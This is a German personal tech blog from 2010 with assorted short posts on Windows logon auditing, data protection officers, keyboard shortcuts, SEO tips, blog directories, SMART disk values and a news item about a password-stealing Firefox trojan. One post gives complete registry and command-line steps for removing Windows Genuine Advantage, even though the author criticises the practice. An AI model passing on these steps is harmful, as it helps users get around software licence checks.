Seiten

Samstag, 25. Dezember 2010

Illegale Anmelde-Versuche protokollieren

Da war doch jemand an meinem PC? Wenn Sie Änderungen an Ihrem Arbeitsplatz - PC oder Home PC wahrnehmen und feststellen möchten, wer sich am Rechner zu schaffen gemacht hat, dann gibt es einfache Tricks mit denen Sie das Anmeldeverhalten protokollieren können.
„Start" » „Einstellungen" » „Systemsteuerung" » „Verwaltung" » „Lokale Sicherheitseinstellungen" » „Anmeldeversuche überwachen" » „Fehlgeschlagen" etc


Das Video finden Sie in einer weitaus besseren Auflösung unter diesem Link:
http://www.franky4you.de/downloads/admin/

Externe Datenschutzbeauftragte und Datenschutzberater

Kleine und mittlere Unternehmen sehen sich mit rechtunsicherem Datenschutz konfrontiert. Stetig wachsende Bestimmungen zum Datenschutz und zur Datensicherheit, die gesetzliche Pflicht zur Bestellung eines Datenschutzbeauftragten und die Einhaltung zahlreicher formaler Regelungen und Festlegungen zum Schutz von personenbezogenen Daten Betroffener machen Outsourcing attraktiv.
Vorteil: Datenschutz leistet einen Beitrag bei der Gewinnung von Kundenvertrauen und kann damit einen Vorteil im Wettbewerb leisten.

Aufgabe: Datenschutzbeauftragte haben vorrangig die Datenverarbeitungsprogramme zu überwachen und das datenverarbeitende Personal mit dem Datenschutz vertraut zu machen.
Datenschutzbeauftragte müssen bestellt werden, wenn personenbezogene Daten (z. B. Arbeitnehmerdaten in der Personalabteilung, Kunden- und Interessentendaten) automatisiert verarbeitet werden:
  • in allen öffentlichen Stellen (beispielsweise Behörden) und
  • in nicht-öffentlichen Stellen (beispielsweise Unternehmen, Vereine, Rechtsanwaltskanzleien, Arztpraxen, Steuerkanzleien), wenn mindestens 10 Personen mit der Verarbeitung dieser Daten beschäftigt sind oder Zugriff auf diese Daten haben. Bei einer nicht automatisierten Datenverarbeitung greift die Vorschrift erst ab 20 Beschäftigten. Hierbei werden Teilzeitkräfte voll berücksichtigt. Unabhängig von der Mitarbeiterzahl muss ein Datenschutzbeauftragter bestellt werden, wenn die Organisation automatisierte Verarbeitungen durchführt, die einer so genannten Vorabkontrolle unterliegen, oder wenn sie personenbezogene Daten geschäftsmäßig verarbeitet, um diese an dritte Personen weiterzugeben (z. B. Adressdatenhandel).
Bei internen Datenschutzbeauftragten ist darauf zu achten, dass diese unabhängig und unter Meidung von Interessenkonflikten Ihren gesetzlichen Aufgaben nachkommen können. Externe Datenschutzbeauftragte müssen natürlich ebenfalls unabhängig ihrer Aufgabe nachkommen und dürfen auch keinen Interessenskonflikten unterliegen. Rechtsanwälte, die oft als externe Datenschutzbeauftragte beauftragt werden, sollten zur Wahrung der Unabhängigkeit daher nicht gleichzeitig zu allgemeinen Rechtsthemen beraten. Was sich in der hohen Anzahl von externen anbietenden Büros widerspiegelt!

Wer online werben will, braucht ehrliche Vergleichs - Zahlen!

IVW - Informationsgemeinschaft zur Feststellung der Verbreitung von Werbeträgern e.V.

Die Informationsgemeinschaft zur Feststellung der Verbreitung von Werbeträgern e. V. (Abk.: IVW) wird von den Medienunternehmen, den Werbungtreibenden sowie den Werbe- und Media-Agenturen in Deutschland unterhalten. Inhalt ihrer Tätigkeit ist das Sammeln valider Daten und deren Bereitstellung für die Leistungskontrolle von Werbeträgern (Vergleichsdaten).

Seit Gründung der IVW am 4. November 1949 hat die Prüfgemeinschaft ihre Kontrolltätigkeit kontinuierlich ausgeweitet und ihre einzelnen Prüfverfahren an die neuen Anforderungen des Werbemarktes angepasst. Sie wurde von den Verlagen in Zusammenarbeit mit dem „Zentralverband der Deutschen Werbewirtschaft“ (ZAW) gegründet. Die IVW ist eine Unterorganisation des ZAW, aber seit 1955 rechtlich selbstständig. Vorsitzender der IVW ist der Präsident des ZAW. Die IVW erhebt und kontrolliert heute Verbreitungsdaten zu beinahe der gesamten Angebotspalette von Werbeträgern in Deutschland.

Seite „Informationsgemeinschaft zur Feststellung der Verbreitung von Werbeträgern“.
In: Wikipedia, Die freie Enzyklopädie.
Bearbeitungsstand: 30. September 2010, 15:51 UTC.
URL: http://de.wikipedia.org/w/index.php?title=Informationsgemeinschaft_zur_Feststellung_der_Verbreitung_von_Werbetr%C3%A4gern&oldid=79745882
(Abgerufen: 25. Dezember 2010, 10:44 UTC)

Online-Nutzungsdaten November 2010

Freitag, 26. November 2010

Anführungszeichen im internationalen Format setzen

Anführungszeichen sind Satzzeichen, die am Anfang und Ende der direkten Rede, eines wörtlichen Zitats oder des zitierten Titels oder Namens eines Werkes stehen. Im normalen Computergebrauch werden Anführungszeichen standardmäßig durch das "Zollzeichen" gesetzt. Wer es ausgefallen und semantisch richtig haben möchte oder auch haben muß, für den die das ein weiterer kleiner Ausflug in die HTML Sonderzeichen.

Die Sonderzeichen:

„ oder „ ergibt Deutsches Anführungszeichen unten („)
” oder “ ergibt Deutsches Anführungszeichen oben (”)

Anführungszeichen setzen deutsch, französisch, englisch.

„ („) und ” (”)
„Anführungszeichen setzen im Deutschen Format“

» (») und « («)
»Anführungszeichen setzen im Französischen Format«

"Anführungszeichen setzen im Englischen Format"

Sonntag, 31. Oktober 2010

Das Originale Twitter Gezwitscher in Homepagen einbinden

Ich fang so langsam an mich näher mit Twitter zu beschätigen. Neben den beliebten Vögelchen von denen mit der Google Bilder Suche jede Menge Variationen gefunden werden können, bietet auch Twitter selbst etliches um das Gezwittscher auf Twitter auf Webseiten und Blogs zu bringen, doch leider ist der nützliche Link recht umständlich zu erreichen.

Twitter / Resources

Donnerstag, 21. Oktober 2010

Coole Infos zur richtigen Nutzung von Keywords

Why do the first 250 words matter?

The first 250 words of web page copy are the most important. They tell both people and search engines what the page is about.
The top two to three keywords should appear about five times each in the first 250 words of web page copy, and two to three times each for every additional 250 words on the page.
Web copy should be written for human visitors first, and search engines second. Synonyms, plurals and correct tenses for keywords should be used as appropriate. Contrary to popular myth, search engines will notice these slight variations as instances of keywords.

Es sollten also die ersten 2-3 Schlüsselworte in den ersten 250 Worten ca. 5 x auftauchen und sollten sich in jeden weiteren 250 Worten noch ca. 3 x wiederholen.

Mittwoch, 20. Oktober 2010

Paradisoft RSS Popper

Ich suche gerade Anwendungen für RSS Feeds. Da der kostenlose Thunderbird hervorragend mit RSS Feeds klar kommt, machte ich mir wegen dem teuren Outlook keine Gedanken. Für alle die mit Outlook auskommen müssen, empfehle ich als Pimping for Outlook diesen Link!

Paradisoft RSS Popper

Dienstag, 19. Oktober 2010

Warnung vor Nebenverdienst-Angeboten im Internet

Warnung vor Nebenverdienst-Angeboten im Internet: 7,99 Euro für zwei Jahre "Click-&-pay"
"Paid4" heißt die Nebenverdienst-Szene, die sich "Päid for" ausspricht und übersetzt "bezahlt für" bedeutet. Zu der Szene zählen Surfer, die sich für ihre Aktivitäten im Netz bezahlen lassen – etwa, indem sie Internetseiten anklicken oder Werbebanner anschauen.
Doch bevor der Rubel rollt, ist stets eine Anmeldung bei den Betreibern der Dienste erforderlich. Und die machen oft erst mal selbst gute Nebengeschäfte: mit den Daten der Kunden. So sichern sich einige Internetportale bei der Anmeldung beispielsweise das Recht, Daten wie Name, Geburtsdatum, Handynummer und Hobbies für "Wettbewerbe, Werbe-SMS und andere Marketing Aktionen" weiterzugeben oder "an zahlende Werbekunden" zu verkaufen.

Einen absolut klasse recherchierten Beitrag finden Sie bei Computer Wissen
http://preview.tinyurl.com/33capv5

Helfen, ohne sich selbst in Gefahr zu bringen

Helfen, ohne sich selbst in Gefahr zu bringen - das ist der wichtigste Rat
der Polizei. Damit ein Helfer oder eine Helferin nicht selbst zum Opfer
wird, gilt es, die Situation richtig einzuschätzen und immer auch die
eigene Sicherheit im Blick zu haben. Für den Ernstfall hat die Polizei
deswegen sechs Regeln für richtiges Verhalten entwickelt. Diese finden sich
auf einem Info-Kärtchen, das in jeden Geldbeutel passt, und im Ernstfall
eine große Hilfe sein kann.

Die sechs Regeln:
  1. Ich helfe, ohne mich selbst in Gefahr zu bringen.
  2. Ich fordere andere aktiv und direkt zur Mithilfe auf.
  3. Ich beobachte genau, präge mir Täter-Merkmale ein.
  4. Ich organisiere Hilfe unter Notruf 110.
  5. Ich kümmere mich um Opfer.
  6. Ich stelle mich als Zeuge zur Verfügung.

Das Info-Kärtchen und weitere Medien der Aktion-tu-was sind bei Ihrer
nächstgelegenen (Kriminal-)Polizeilichen Beratungsstelle erhältlich und als
Download eingestellt unter:
http://www.aktion-tu-was.de/service/mehr-zivilcourage

Tja das war wohl NIX!

Mit von Nutzern definierten Suchmaschinen läßt sich einiges anstellen und im Augenblick bietet anscheinend nur Google dieses Feature an. Wir fanden zwar bei Mojeek eine weitere Möglichkeit, die wir auch nutzen wollten, doch damit wars dann auch schon, also an alle die auf unsere weiteren von Nutzer definierten Suchmaschinen warteten: Sorry das wird NIX!


Hi Frank,

Thanks for your interest in Mojeek personal search, although unfortunately we have decided to disable the feature whilst we finalise a major upgrade to the system in the next few weeks/month. After that time we're not sure whether the personal search will return or not, or if it does in what format.

Sorry I couldn't be more help at present.

Regards,
Marc


Die entsprechenden Hinweise auf den WebSeiten werden wir sukzessive wieder rausnehmen!

Montag, 18. Oktober 2010

Den Blog unter die Leute bringen

Wenn Sie mit 5 Minuten Arbeit im Internet reich werden wollen, dann muß Ihr Blog natürlich auch bekannt sein, damit die Völkerwanderschaft von Besuchern bei Ihrem Blog vorbeikommt, sofern Sie nicht genügend Besucher gegen Bezahlung beim Blog vorbeischleifen wollen.Für alle die auf die Selbstreinigungskraft des Internets vertrauen, haben wir eine Liste mit WebSites erstellt, die Ihnen bei der Verbesserung des Bekanntheitsgrads Ihres Blogs nützlich sein können:

  1. A2B Location-Based Search Engine
  2. blo.gs: ping a weblog
  3. Submit Blog | BLOGFINDS
  4. blogmatcher.com
  5. Nachrichten-Suchmaschine RedTram | Seite eintragen
  6. Adobe Feeds
  7. Submit RSS Site
  8. Eatonweb Blog Directory Portal :: Submit or Add your Blog
  9. RDF-Ticker Add a channel
  10. Add A Site - blogarama.com
  11. blogBunch : Suggest a Site
  12. BC / Signup
  13. Blogdigger - Add Blog Form
  14. My blogs - BlogExplosion.com
  15. Blog anmelden und eintragen bekannt machen im Blogverzeichnis Blog Verzeichnis Bloggerei
  16. Bloggeries Blog Directory - THE Human Edited Blog Directory
  17. Search at blog directory Bloggernity.com using our blog search engine tool: Add a Link
  18. www.bloghop.com
  19. Bloghub.com - blog directory & blog search engine: User Login
  20. Submit Blog
  21. Register an Account :: BlogRankings
  22. ping.php
  23. BlogSweet.com - Blog Directory
  24. Register an Account - Blog Top Sites
  25. BlogTree.com - Blog Author Signup
  26. Suggest a Link- Boing Boing
  27. E-Cards from Bravenet
  28. CRAYON.net - Suggestions?
  29. RSS and ATOM Feed Boosting Engine - FEEDCAT.NET
  30. Local Blog Directory - feedmap.net
  31. FeedPub.com - Add Listing, Submit URL, Add Website to Our Web Directory
  32. Feeds4all - Webfeed Directory
  33. Submit Your RSS or Atom News Feed
  34. FeedsFarm.com - News and RSS Feed Search
  35. Blog Submission Service: FeedShot
  36. FyberSearch - Add URL
  37. Adding yourself to GeoURL - GeoURL (2.0)
  38. Blog Search Engine - Getblogs.com
  39. Globe of Blogs ::: Register Your Blog!
  40. IceRocket real-time search
  41. Add Your Blog - IceRocket
  42. Ping Us - IceRocket
  43. Germany - Add your Url
  44. News Feeds: Add Feed
  45. NewsIsFree: Your Personal News Portal
  46. RSS feeds for General at NewzAlert.com
  47. Blog and ping | Pingoat
  48. RSS Feed hinzufügen / Plazoo
  49. Blog Directory - Free Submissions and Large Exposure
  50. Read A Blog - Submit your Blog or RSS feed
  51. RedTram News Search Engine | Add source
  52. RSS Agent - Neuen RSS Feed eintragen
  53. RSSknip
  54. Rss Feeds Directory
  55. RSS Submission Form
  56. RSS Submission Form
  57. Blogz - Add your blog
  58. Spurl.net 1.0 - Free online bookmarks with so much more...
  59. Syndic8.com - Suggest a Feed
  60. Page Not Found - Technorati
  61. Sign-up
  62. Submit URL | Add URL | Wil's Domain
  63. Weblog Directory •
Hinweis: Sie sollten Ihren Blog um Linkspamming zu vermeiden nicht selbst in mehr als 10 Sites pro Monat  eintragen. Ist eine Faustregel, die ich irgendwo gelesen habe, andererseits zählen 1.000 Backlinks immer noch als wenig bei Yahoo! Und die Klicks durch Paidmailer etc. empfinde ich immer noch irgendwie als Betrug, der relativ viel kostet und den Klickenden nen richtig mickrigen Verdienst bei großem Zeitaufwand mit hohem Risiko (-Klicks auf Abzockersites) einbringt!

Wenn Sie mit Firefox durch das Internet surfen, dann bietet Ihnen Cyberpaerles Auswahl an kostenlosen Addins für Firefox etliche nützliche Features um die obigen Links flotter abzuarbeiten.

    Freitag, 15. Oktober 2010

    Malware als Passwortdieb: Schadsoftware konfiguriert Browser Firefox um - Magnus.de

    Malware als Passwortdieb: Schadsoftware konfiguriert Browser Firefox um - Magnus.de:
    "Passwortdieb - Malware konfiguriert Firefox um"

    Ein Schädling manipuliert eine Konfigurationsdatei von Firefox, um Passwörter ausspionieren zu können. Er konfiguriert den Browser so, dass dieser ohne Rückfrage beim Benutzer alle Passwörter speichert, die für Anmeldungen im Web eingegeben werden.

    Im Webbroot Threat Blog berichtet Andrew Brandt über ein Trojanisches Pferd namens 'Trojan-PWS-Nslog', das auch aktuelle Firefox-Versionen manipulieren kann. Standardmäßig fragt Firefox nach Eingabe eines Passworts auf einer Website, ob der Benutzer das Passwort speichern möchte. Anwender können das Speichern von Passwörtern ganz abschalten, eine Möglichkeit Passwörter ohne.....

    Verfügbare Tastenkombinationen in Windows XP

    Allgemeine Tastenkombinationen

    [STRG]+[C] Kopieren
    [STRG]+[X] Ausschneiden
    [STRG]+[V] Einfügen
    [STRG]+[Z] Rückgängig
    [ENTF] Löschen
    [UMSCHALT]+[ENTF] Markiertes Element dauerhaft entfernen, ohne es in den Papierkorb zu verschieben
    [STRG] beim Ziehen eines Elements Markiertes Element kopieren
    [STRG]+[UMSCHALT] beim Ziehen eines Elements Verknüpfung zum markierten Element erstellen
    [F2] Markiertes Element umbenennen
    [STRG]+[NACH-RECHTS-TASTE] Einfügemarke an den Anfang des nächsten Wortes stellen
    [STRG]+[NACH-LINKS-TASTE] Einfügemarke an den Anfang des vorigen Wortes stellen
    [STRG]+[NACH-UNTEN-TASTE] Einfügemarke an den Anfang des nächsten Absatzes stellen
    [STRG]+[NACH-OBEN-TASTE] Einfügemarke an den Anfang des vorigen Absatzes stellen
    [STRG]+[UMSCHALT] mit einer beliebigen Pfeiltaste Textblock markieren
    [UMSCHALT] mit einer beliebigen Pfeiltaste Mehrere Elemente in einem Fenster oder auf dem Desktop markieren oder Text in einem Dokument markieren
    [STRG]+[A] Alles markieren
    [F3] Datei oder Ordner suchen
    [ALT]+[EINGABE] Eigenschaften des markierten Elements anzeigen
    [ALT]+[F4] Aktives Element schließen oder aktives Programm beenden
    [ALT]+[EINGABE] Eigenschaften des markierten Objekts anzeigen
    [ALT]+[LEERTASTE] Kontextmenü für aktives Fenster öffnen
    [STRG]+[F4] In Programmen, die das gleichzeitige öffnen mehrerer Dokumente zulassen: Aktives Dokument schließen
    [ALT]+[TAB] Zwischen geöffneten Elementen wechseln
    [ALT]+[ESC] Elemente in der Reihenfolge durchlaufen, in der sie geöffnet wurden
    [F6] Bildschirmelemente in einem Fenster oder auf dem Desktop durchlaufen
    [F4] Adressleistenliste in "Arbeitsplatz" oder im Windows Explorer anzeigen
    [UMSCHALT]+[F10] Kontextmenü für markiertes Element anzeigen
    [ALT]+[LEERTASTE] Systemmenü für aktives Fenster anzeigen
    [STRG]+[ESC] Startmenü anzeigen
    [ALT]+Unterstrichener Buchstabe in einem Menünamen Entsprechendes Menü anzeigen
    Unterstrichener Buchstabe in einem Befehlsnamen oder in einem geöffneten Menü Entsprechenden Befehl ausführen
    [F10] Menüleiste im aktiven Programm aktivieren
    [NACH-RECHTS-TASTE] Nächstes Menü nach rechts oder Untermenü öffnen
    [NACH-LINKS-TASTE] Nächstes Menü nach links öffnen oder Untermenü schließen
    [F5] Aktives Fenster aktualisieren
    [RüCKTASTE] übergeordneten Ordner in "Arbeitsplatz" oder im Windows Explorer anzeigen
    [ESC] Aktuellen Vorgang abbrechen
    [UMSCHALT] beim Einlegen einer CD-ROM in das CD-ROM-Laufwerk Automatisches Abspielen der CD-ROM verhindern

    Tastenkombinationen für Dialogfelder

    [STRG]+[TAB] Vorwärts durch die Registerkarten navigieren
    [STRG]+[UMSCHALT]+[TAB] Rückwärts durch die Registerkarten navigieren
    [TAB] Vorwärts durch die Optionen navigieren
    [UMSCHALT]+[TAB] Rückwärts durch die Optionen navigieren
    [ALT]+Unterstrichener Buchstabe Entsprechenden Befehl ausführen oder entsprechende Option auswählen
    [EINGABE] Befehl für aktive Option oder Schaltfläche ausführen
    [LEERTASTE] Kontrollkästchen aktivieren oder deaktivieren, wenn die aktive Option ein Kontrollkästchen ist
    Pfeiltasten Schaltfläche auswählen, wenn die aktive Option eine Gruppe von Optionsschaltflächen ist
    [F1] Hilfe anzeigen
    [F4] Elemente in der aktiven Liste anzeigen
    [RüCKTASTE] übergeordneten Ordner anzeigen, wenn ein Ordner im Dialogfeld Speichern unter oder öffnen markiert ist

    Tastenkombinationen für den Windows Explorer

    [ENDE] Ende des aktiven Fensters anzeigen
    [POS1] Anfangs des aktiven Fensters anzeigen
    [NUM]+Stern (*) Alle Unterordner zum markierten Ordner anzeigen
    [NUM]+Pluszeichen (+) Inhalt des markierten Ordners anzeigen
    [NUM]+Minuszeichen (-) Markierten Ordner reduzieren
    [NACH-LINKS-TASTE] Aktuelle Auswahl reduzieren, sofern sie erweitert ist, oder übergeordneten Ordner markieren
    [NACH-RECHTS-TASTE] Aktuelle Auswahl erweitern, sofern sie reduziert ist, oder ersten Unterordner markieren

    Navigation im Microsoft Internet Explorer

    [STRG]+[B] Dialogfeld Favoriten verwalten öffnen
    [STRG]+[E] Suchleiste öffnen
    [STRG]+[F] Dienstprogramm "Suchen" starten
    [STRG]+[H] Leiste "Verlauf" öffnen
    [STRG]+[I] Leiste "Favoriten" öffnen
    [STRG]+[L] Dialogfenster öffnen öffnen
    [STRG]+[N] Weitere Browserinstanz mit derselben Webadresse öffnen
    [STRG]+[O] Dialogfenster öffnen öffnen, wie bei [STRG]+[L]
    [STRG]+[P] Dialogfenster Drucken öffnen
    [STRG]+[R] Aktuelle Webseite aktualisieren
    [STRG]+[W] Aktuelles Fenster schließen


    Navigation mit Windows Taste

    • Windows + M minimiert alle Fenster, die einen Button in der Taskleiste haben und zeigt den Desktop; Fenster ohne Taskleisten-Button werden so zugänglich.
    • Windows + Shift + M stellt alle zuvor minimierten Fenster wieder her.
    • Windows + D minimiert die komplette Fensterlandschaft zum Desktop und zurück.
    • Windows + E öffnet ein Fenster des Windows-Explorers.
    • Windows + F öffnet die Suchfunktion.
    • Windows + R öffnet das Fenster Ausführen.
    • Windows + L sperrt den Rechner (Anwendungen laufen weiter, zum erneuten Zugriff ist die Eingabe des Kennwortes erforderlich).
    • Windows + Pause öffnet das Fenster „Systemeigenschaften“.
    • Windows + U erlaubt jederzeit Zugriff auf die Eingabehilfen.

     

    Freitag, 8. Oktober 2010

    Benutzer Definierter Player für YouTube

    Nachdem ich mir gerade mal wieder einen Wolf gesucht habe um einen Benutzer definierten Player zu erstellen, weil die Hilfe andauernd auf Links bei der YouTube - Konto Administrierung hinwies, die aber leider nicht in unserer Oberfläche zu finden waren, poste ich hier mal den Link:

    http://www.youtube.com/custom_player

    Mit dem benutzer definierten Player lassen sich YouTube Playlisten in einen schickeren Player einbetten und auch besser auf einer Homepage anbieten.

    Jetzt fehlt mir blos noch der Link mit der ich zur Übersicht meiner bisherigen YouTube Player komme.
    Kennt den jemand?
    Und da habe ich den Link doch auch schon!
    Denn wer unten auf den Abbrechen Button klickt, der wird auf die Seite:

    http://www.youtube.com/my_players

    geleitet. Und diese Seite hat die wunderbare Überschrift!

    Benutzerdefinierte Videoplayer

    Erstelle benutzerdefinierte Videoplayer für die Veröffentlichung auf Websites oder in Blogs. Du kannst die Farben und Inhalte eines Players jederzeit ändern. Der Player wird dann automatisch mit den neuen Einstellungen aktualisiert.

    Freitag, 1. Oktober 2010

    META Angaben bei Blogger ändern

    Ich habe versucht die META Tags des Blogs in Blogger.com zu verändern, aber da war leider nicht viel möglich. Die schlauste Lösung stellt meiner Meinung dieses Codesnippet dar.


    Damit wird für die Eingangsseite des Blogs eine Beschreibung und Schlüsselworte an die SEO übermittelt. Für die übrigen Blogseiten werden zumindest die Schlüsselwörter eingetragen. Die Beschreibung entfällt für die übrigen Seiten.
    Blogger läßt nur eine umständlich auszuführende Abfrage in den Metaangaben des Blogs zu, die zudem nach jedem neuen Blogartikel wieder abgeändert werden müßte. Diese Lösung ist mir absolut zu umständlich, da macht das schnelle Blogen einfach keinen Sinn mehr!
    Da nimm ich lieber dann die mittelmäßige SEO Freundlichkeit in Kauf!

    Dienstag, 28. September 2010

    Wir ziehen um auf neue Server!

    Wir ziehen mit unseren Domains auf neue Server um. Nachdem wir fast schon Jahrzehnte lang unsere Homepagen auf Strato hosteten, bekamen wir von WebGo24 ein Angebot, daß wir nicht abschlagen konnten. Nach der ersten Testphase beschloßen wir den kompletten Umzug.

    Die Erfahrungen, die wir bei dem Umzug sammeln dürfen, werden wir Euch noch in den passenden Kategorien mitteilen, aber im Augenblick sind

    * eMail Server konfigurieren
    * eMail Klients konfigurieren
    * Passwort geschützte Bereiche einrichten
    * Datenbanken exportieren
    * Datenbanken importieren
    * Domains ummelden
    * Subdomains einrichten
    * Server in den Anwendungen konfigurieren
    * .....

    und jede Menge anderer Dinge angesagt. Dementsprechend wird es in den nächsten Wochen und Monaten wohl weniger mit neuen Features und alt gewohntes dürfte ab und an holprig sein.
    Trotzdem: Wir bemühen uns natürlich die Einschränkungen so gering, wie möglich zu halten!

    Freitag, 24. September 2010

    Tastenkombination in den Internet - Browsern

    Tastenkombination im Firefox-Browser

    Zum blitzschnellen Blättern durch die Tabs eine praktische Sache..
    [Strg][T] - eine neue Registerkarte öffnen
    [Strg][Bild rauf] - zur Registerkarte links vom aktuellen Tab springen
    [Strg][Bild runter] - zur Registerkarte links vom aktuellen Tab springen

    Tastenkombination für den Internet Explorer von Microsoft
    F4     In die Adresszeile springen
    F5     Seite aktualisieren
    F11   Vollbild
    Alt     Menüleiste temporär einblenden
    Alt-Links      Vorherige Seite
    Alt-M           Homepage aufrufen
    Alt-Rechts     Nächste Seite
    Alt-Return     Eingegebene URL in neuer Registerkarte/Tab öffnen
    Esc Ladevorgang der aktuellen Seite abbrechen
    Strg-”+” Web-Seite vergrößern
    Strg-”-”  Web-Seite verkleinern
    Strg-D     Aktuelle Seite zu Favoriten hinzufügen
    Strg-E      In die Suchleiste springen
    Strg-F      Aktuelle Seite durchsuchen
    Strg-H     Verlauf aufrufen
    Strg-I       Favoriten aufrufen
    Strg-J       RSS-Feeds aufrufen
    Strg-N      Neues Fenster öffnen
    Strg-P       Drucken
    Strg-Q      Miniaturansichten aller Registerkarten/Tabs
    Strg-R      Neue Registerkarte/Tab öffnen
    Strg-Tab   Zwischen Registerkarten/Tabs wechseln
    Strg-W     Aktuelle Registerkarte/Tab schließen

    Windows Genuine Advantage entfernen

    Ich habe vor kurzem auf einer renommierten Webseite folgende Anleitung gefunden um das WGUI Tool von Microsoft zu deinstallieren. Der Trick funktioniert natürlich, allerdings nur temporär, denn es wird bei jedem größeren Windows Update diese Prozedur von Neuem notwendig. Was soll denn bitte der Geiz? Für weit unter 30.- Euro wird bereits ein voll zu lizensierendes und zu aktivierendes Windows XP Professional in Deutsch incl. Service Pack2 mit einem freundlichen Lächeln für die Kundschaft über den Ladentisch geschoben.
    Diese Prozedur ist übrigens nicht der neueste in diesem Metier. Er wurde eigentlich bereits vor etlichen Jahren in den Anfängen des Windows XP zum Thema WGUI  auf vielen Plattformen diskutiert!
    Hat also bereits eher geschichtlichen Charakter!

    Um zum Beispiel bei Windows XP das Tool Windows Genuine Advantage zu entfernen, ist ein wenig Handarbeit angesagt. Mit folgenden Schritten werden Sie das Genuine-Advantage-Tool wieder los:
    1. Öffnen Sie den Registry-Editor, indem Sie die Tastenkombination [Windows-Taste][R] drücken und den Befehl “regedit” eingeben.
    2. Im Registrierungseditor wechseln Sie in folgenden Ordner:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
    Hier markieren Sie den Unterschlüssel “WGALogon” und löschen ihn mit der [Entf]-Taste. Bestätigen Sie die Sicherheitsabfrage mit “Ja”.
    3. Dann starten Sie den Windows-Explorer und wechseln in den Ordner “C:\Windows\System32″. Benennen Sie die dort gespeicherte Datei “wgalogon.dll” und “wgatray.exe” um, indem Sie ans Ende den Zusatz “.alt” hängen. Die Dateinamen lauten dann zum Beispiel folgendemaßen:
    wgalogon.dll.alt
    wgatray.exe.alt
    4. Starten Sie den Rechner neu. Öffnen Sie das Fenster der Eingabeaufforderung, indem Sie die Tastenkombination [Windows-Taste][R] drücken und den Befehl “cmd” eingeben. Danach geben Sie folgende Zeile ein und bestätigen sie mit der [Return]-Taste:
    Regsvr32 %Windir%\system32\LegitCheckControl.dll /u
    5. Starten Sie den Rechner ein weiteres Mal neu. Öffnen Sie erneut die Eingabeaufforderung, und geben Sie nacheinander die folgenden Zeilen ein (die Sie jeweils mit der [Return]-Taste bestätigen):
    del %Windir%\system32\wgalogon.dll.alt
    del %Windir%\system32\WgaTray.exe.alt
    del %Windir%\system32\LegitCheckControl.dll
    6. Öffnen Sie erneut den Registrierungseditor, und wechseln Sie in den folgenden Ordner:
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
    Hier löschen Sie den erneut angelegten Unterordner “WGALogon”. Danach wechseln Sie in den Ordner
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
    und entfernen hier den Unterordner “WGA”. Damit ist das Windows Genuine Advantage Tool vom Rechner verschwunden.

    Auf gut Deutsch gesagt, also echter Schwachsinn! Nicht nur, daß jeder, der vor über 3400 Tagen dieses Tutorial las, welches heute sogar in Computerzeitschriften zu finden ist, las, zum Staatsfeind avancierte, NEE bei jedem automatisiertem Update wurde dieser komplizierte HAck von neuem notwendig oder XP rotzte einfach ab!
    Leute spendet weniger Euren Parteien und kauft Euch endlich ne LIZENZ!

    SMART Werte - Self-Monitoring, Analysis and Reporting Technology

    Das Self-Monitoring, Analysis and Reporting Technology (SMART bzw. S.M.A.R.T.), zu deutsch System zur Selbstüberwachung, Analyse und Statusmeldung, ist ein Industriestandard, der in Computerfestplatten  eingebaut wird. Es ermöglicht das permanente Überwachen wichtiger Parameter und somit das frühzeitige Erkennen drohender Defekte.

    Parametername Bedeutung
    Raw Read Error Rate Kritisch. Ein niedriger Wert weist auf unkorrigierbare Lesefehler hin, die mit der Plattenoberfläche oder mit den Leseköpfen zusammen hängen.
    Througput Performance Kritisch. Allgemeiner Indikator für den Datendurchsatz. Niedrige Werte zeigen, dass die Platte nicht mehrin vollem Tempo arbeiten kann.
    Spin Up Time Mittlere Startzeit des Motors, der die Platten antreibt. Schlechte Werte können auf Lagerprobleme hinweisen, die oft von zu hohen Temperaturen kommen.
    Start/Stop Count Unkritisch. Zählt die Start/Stop-Vorgänge des Laufwerks.
    Reallocated Sector Count Sehr kritisch. Zählt, wieviele Reservesektoren die Festplatte bereits genutzt hat. Deutet auf Medienprobleme hin.
    Read Channel Margin Gibt an, wie viel der Bandbreite bei Lesevorgängen im Mittel genutzt wird. Die genaue Bedeutung ist undokumentiert.
    Seek Error Rate Kritisch. Zählt die Fehler bei Lesevorgängen, die vom Zustand des Positionierungssystems, oder von der Oberfläche abhängig sind.
    Seek Time Performance Allgemeiner Wert, der die Leistung der Leseköpfe beschreibt. Niedrige Werte weisen auf Mechanische Probleme hin.
    Power On Hours Count Zählt die Betriebsstunden der Platte. Meist in einem herstellerspezifischen Format.
    Spin Retry Count Kritisch. Gibt an, wie oft der Motor anlaufen musste, damit die Platte ihre betriebstypische Umdrehungszahl erreich.
    Recalibration Retries Kritisch. Zählt, wie oft die Platte die Schreib-Leseköpfe neu kalibrieren musste. Weißt auf mechanische Fehlfunktionen hin.
    Device Power Cycle Count Zeigt die Statistik, wie oft das Laufwerk ein- und ausgeschaltet wurde.
    Soft Read Error Rate Gibt an, wie oft das Betriebssystem die gelesenen Daten als fehlerhaft verworfen hat
    G-Sense Error Rate G-Sense steht für einen Schock-Sensor, der heftige Erschütterungen im Betrieb misst
    Power-Off Retract Cycle Zählt lediglich, wie oft die Festplatte abgeschaltet wurde
    Load/Unload Cycle Count Gibt an, wie oft die Platte ihre Schreib- und Leseköpfe in die Parkposition (Landing Zone) gefahren hat.
    Temperature Gibt die Temperatur des Laufwerks an. Eher unwichtig, da die Messung bei den meisten Geräten sehr ungenau ist.
    Reallocation Events Count Sehr kritisch. Zählt jeden Versuch der Platte, Sektoren umzumappen, auch wenn dies nicht gelingt.
    Current Pending Sector Count Sehr kritisch. Gibt die Anzahl der instabilen Sektoren an, die auf eine Verschiebung in den reservierten Bereich warten.
    Uncorrectable Sector Count Sehr kritisch. Die Anzahl der fehlerhaften Sektoren, welche die interne Plattenlogik nicht restaurieren und in den reservierten Bereich verschieben kann
    UltraDMA CRC Error Rate Kritisch. Anzahl der Prüfsummenfehler bei der Datenübertragung. Kann auch auf defekte Kabel, Treiberkonflikte oder auf Übertaktungsprobleme hinweisen
    Write Error Rate Kritisch. Zählt, wie oft Fehler beim Schreiben von Sektoren aufgetreten sind.
    Disk Shift Sehr Kritisch. Dieser Wert gibt an, ob sich aufgrund von Temperaturproblemen oder Schockeinwirkungen eine Umwucht gebildet hat.
